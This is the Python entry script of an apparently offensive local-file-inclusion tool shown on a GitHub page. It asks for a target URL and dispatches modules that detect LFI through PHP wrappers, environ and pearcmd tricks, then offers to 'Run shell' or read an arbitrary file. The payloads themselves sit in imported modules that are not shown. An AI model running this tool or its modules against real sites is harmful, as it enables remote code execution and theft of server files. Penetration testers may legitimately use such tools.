-
Notifications
You must be signed in to change notification settings - Fork 0
/
LFISec.py
105 lines (84 loc) · 4.25 KB
/
LFISec.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
from rich.console import Console
from prompt_toolkit import HTML, PromptSession
from prompt_toolkit.history import InMemoryHistory
from core.LFIChecker import LFIChecker
from core.DataChecker import DataChecker
from core.EnvironChecker import EnvironChecker
from core.PHPFilterChecker import PHPFilterChecker
from core.PHPInputExploiter import PHPInputExploiter
from core.PHPPearCmdChecker import PHPPearCmdChecker
from core.PHPFilterChainGenerator import PHPFilterChainGenerator
console = Console()
class Module:
def __init__(self, url, checker_class, check_method, action):
self.url = url
self.checker_class = checker_class
self.check_method = check_method
self.action = action
self.checker = self.checker_class(self.url, silent=False)
def update_url(self, new_url):
self.url = new_url
self.checker = self.checker_class(self.url, silent=False)
def run(self):
result, param_name = getattr(self.checker, self.check_method)()
console.print(f"[bold white]LFI detected ([magenta][/bold white]{self.checker.__class__.__name__}[/magenta][bold white]):[/bold white] {result}")
if result == True and self.action:
choice = console.input(f"[bold yellow]Select an action (1: [green]{self.action}[/green], 2: [red]Skip[/red]): ")
if choice == "1":
if self.action == "Run shell":
getattr(self.checker, self.action.lower().replace(" ", "_"))(param_name)
elif self.action == "Exploit file":
filename = console.input('Enter filename to display: ')
getattr(self.checker, self.action.lower().replace(" ", "_"))(filename, param_name)
def banner():
banner = '''[bold yellow]
__ _______________
/ / / ____/ _/ ___/___ _____
/ / / /_ / / \__ \/ _ \/ ___/
/ /___/ __/ _/ / ___/ / __/ /__
/_____/_/ /___//____/\___/\___/
[blue]Creator:[/blue][green] andrisecops[/green]
'''
console.print(banner)
def main():
banner()
url_session = PromptSession(history=InMemoryHistory())
cmd_session = PromptSession(history=InMemoryHistory())
url = url_session.prompt(HTML('<b><ansiyellow>Enter site URL to test: </ansiyellow></b>'))
modules = [
Module(url, PHPInputExploiter, "filter_check", "Run shell"),
Module(url, PHPFilterChainGenerator, "filter_check", "Run shell"),
Module(url, DataChecker, "data_check", "Run shell"),
Module(url, PHPFilterChecker, "filter_check", "Exploit file"),
Module(url, EnvironChecker, "environ_check", "Run shell"),
Module(url, PHPPearCmdChecker, "pearcmd_check", "Run shell"),
Module(url, LFIChecker, "path_traversal_checker", None)
]
while True:
try:
console.print("\n[bold yellow]Select a module to run:[/bold yellow]")
for i, module in enumerate(modules, 1):
console.print(f"[bold cyan]{i}[/bold cyan]: [bold green]{module.checker.__class__.__name__}[/bold green]")
console.print(f"[bold cyan]{len(modules) + 1}[/bold cyan]: [bold green]Change URL[/bold green]")
while True:
choice = cmd_session.prompt(HTML('<b><ansired>></ansired><ansiyellow>></ansiyellow><ansigreen>></ansigreen></b> '))
if choice.isdigit():
if 1 <= int(choice) <= len(modules):
modules[int(choice) - 1].run()
break
elif int(choice) == len(modules) + 1:
url = url_session.prompt(HTML('<b><ansiyellow>Enter new site URL to test: </ansiyellow></b>'))
for module in modules:
module.update_url(url)
break
else:
console.print("[bold red]Invalid Option[/bold red]")
elif choice == "":
continue
else:
console.print("[bold red]Invalid Option[/bold red]")
except KeyboardInterrupt:
console.print("\n[bold yellow]Bye Bye H4x0R !!![/bold yellow]")
break
if __name__ == '__main__':
main()